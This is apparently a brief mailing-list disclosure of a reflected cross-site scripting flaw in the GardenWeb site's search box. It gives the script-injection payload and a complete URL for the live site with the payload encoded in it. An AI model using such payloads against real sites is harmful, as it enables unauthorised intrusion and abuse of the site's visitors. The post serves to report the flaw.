<<< Date Index >>>     <<< Thread Index >>>

XSS in GardenWeb



use the searchbox with

"><script>alert('XSS')</script>

eg url:
http://search.gardenweb.com/search/nph-ind.cgi?term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E